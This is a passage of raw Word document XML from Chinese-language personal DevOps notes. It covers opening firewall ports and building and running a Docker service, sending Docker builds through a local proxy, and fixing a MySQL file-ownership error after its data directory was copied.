      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sudo ufw allow 5000/tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>放开端口；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>目前连接数据库是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>192.168.3.203:23306</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>默认</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>bridge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>模式，要访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>203</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>数据库需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sudo ufw allow 23306/tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>如果需要指定端口映射，自行更改参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>docker run -p &lt;host-port&gt;:&lt;container-port&gt; &lt;image-name&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>构建后大小为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>77.5MB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>docker build -t bling-trends-server .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>运行命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>docker run --name bling_trends_server_container -itd -p 5000:5000 bling-trends-server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC68372" w14:textId="70AD5938" w:rsidR="00DF6517" w:rsidRDefault="00DF6517" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3219B9CC" w14:textId="2B161A96" w:rsidR="002F4C5A" w:rsidRDefault="005338CA" w:rsidP="00FB792A">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r w:rsidR="00FB792A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构建走外国流量，省下换源</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E47C909" w14:textId="4538A373" w:rsidR="00FB792A" w:rsidRDefault="00FA754F" w:rsidP="00FB792A">
      <w:r w:rsidRPr="00FA754F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D0F309C" wp14:editId="737B36CB">
            <wp:extent cx="5274310" cy="2678430"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1143814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678430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6434C262" w14:textId="73B04BF8" w:rsidR="00FB792A" w:rsidRDefault="00FA754F" w:rsidP="00FB792A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>国内的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VPS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>镜像，可以看到随便</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的源</w:t>
      </w:r>
      <w:r w:rsidR="00590D01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，下载</w:t>
      </w:r>
      <w:r w:rsidR="00590D01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>opencv</w:t>
      </w:r>
      <w:r w:rsidR="00590D01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的时候访问不到这个镜像源</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60689994" w14:textId="50BEEF20" w:rsidR="00590D01" w:rsidRDefault="00590D01" w:rsidP="00FB792A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>除了传统的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>国内换源外，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B70C9C4" w14:textId="0DF8F805" w:rsidR="00590D01" w:rsidRDefault="00590D01" w:rsidP="00FB792A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果有个国外的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搭建代理节点，可以更省事儿的解决这个问题：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691AD7B8" w14:textId="1FAF8823" w:rsidR="00FB792A" w:rsidRDefault="00590D01" w:rsidP="00FB792A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ubtuntu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FD05DA" w14:textId="093F3CBB" w:rsidR="002F4C5A" w:rsidRDefault="00590D01" w:rsidP="00590D01">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">vim </w:t>
      </w:r>
      <w:r w:rsidRPr="00590D01">
        <w:t>/etc/default/docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B13007A" w14:textId="69EED449" w:rsidR="00590D01" w:rsidRDefault="00590D01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E55605F" w14:textId="77777777" w:rsidR="00590D01" w:rsidRDefault="00590D01" w:rsidP="00590D01">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>export http_proxy=http://127.0.0.1:6666</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58332DC4" w14:textId="7C5EDA40" w:rsidR="00590D01" w:rsidRDefault="00590D01" w:rsidP="00590D01">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>export https_proxy=http://127.0.0.1:6666</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487CA890" w14:textId="265E68F9" w:rsidR="00590D01" w:rsidRDefault="00590D01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7EB6A6" w14:textId="77777777" w:rsidR="002F4C5A" w:rsidRDefault="002F4C5A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E98423A" w14:textId="154B6A71" w:rsidR="00590D01" w:rsidRDefault="00590D01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E454E9E" w14:textId="607D9F28" w:rsidR="00590D01" w:rsidRDefault="00590D01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00590D01">
        <w:lastRenderedPageBreak/>
        <w:t>systemctl restart docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE492B0" w14:textId="77777777" w:rsidR="00590D01" w:rsidRDefault="00590D01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="693F947B" w14:textId="0BF79F8F" w:rsidR="00590D01" w:rsidRDefault="00590D01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker-compose build</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就顺利了，这样比手动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>copy python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>源要简单很多</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4544AB03" w14:textId="6719DF34" w:rsidR="00DF6517" w:rsidRPr="00DF6517" w:rsidRDefault="00181742" w:rsidP="00181742">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>疑难杂症：拷贝</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原始目录到其他目录，报错</w:t>
      </w:r>
      <w:r w:rsidRPr="00181742">
        <w:t>chown: cannot dereference '/var/lib/mysql/mysql.sock': No such file or directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CD59BE" w14:textId="60F88B9D" w:rsidR="005808D3" w:rsidRDefault="005808D3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19F78301" w14:textId="77F165AE" w:rsidR="00181742" w:rsidRDefault="00181742" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模仿此贴</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A10EBB7" w14:textId="52FF8B4D" w:rsidR="005808D3" w:rsidRDefault="00181742" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00181742">
        <w:t>https://github.com/docker-library/mysql/issues/939</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA9DAAF" w14:textId="3F0565B6" w:rsidR="005808D3" w:rsidRDefault="00181742" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D1BD201" wp14:editId="6C41E58E">
            <wp:extent cx="5274310" cy="3164840"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="193280634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06343" name="图片 1" descr="图形用户界面, 应用程序&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3164840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70274046" w14:textId="69E26EED" w:rsidR="00181742" w:rsidRDefault="00181742" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解决</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB374A2" w14:textId="77777777" w:rsidR="00181742" w:rsidRDefault="00181742" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06F7DC29" w14:textId="04304CD8" w:rsidR="00181742" w:rsidRDefault="00181742" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原因是复制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据过来的时候没有保持原先文件的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>chown</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5254609E" w14:textId="77777777" w:rsidR="00181742" w:rsidRDefault="00181742" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74BD8739" w14:textId="5C048370" w:rsidR="00181742" w:rsidRDefault="00181742" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不需要设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00181742">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">privileged: true  # </w:t>
      </w:r>
      <w:r w:rsidRPr="00181742">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许特权模式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715AF003" w14:textId="77777777" w:rsidR="00181742" w:rsidRDefault="00181742" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="389D3DFA" w14:textId="77777777" w:rsidR="00181742" w:rsidRDefault="00181742" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01B9AF56" w14:textId="77777777" w:rsidR="00181742" w:rsidRDefault="00181742" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E0F0FE6" w14:textId="77777777" w:rsidR="005808D3" w:rsidRDefault="005808D3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D2D0EF3" w14:textId="6E2009AE" w:rsidR="005435E7" w:rsidRDefault="005435E7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="140" w:name="_Toc159779601"/>
      <w:r>
        <w:t>配置文件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="140"/>
    </w:p>
    <w:p w14:paraId="5E204CF3" w14:textId="4EC9F9B2" w:rsidR="005435E7" w:rsidRDefault="005B2FC2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置文件共</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ini xml json yaml toml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A6D6DA" w14:textId="028D2B70" w:rsidR="005B2FC2" w:rsidRDefault="005B2FC2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CC80AAD" w14:textId="77777777" w:rsidR="005B2FC2" w:rsidRDefault="005B2FC2" w:rsidP="009222EB">
      <w:pPr>
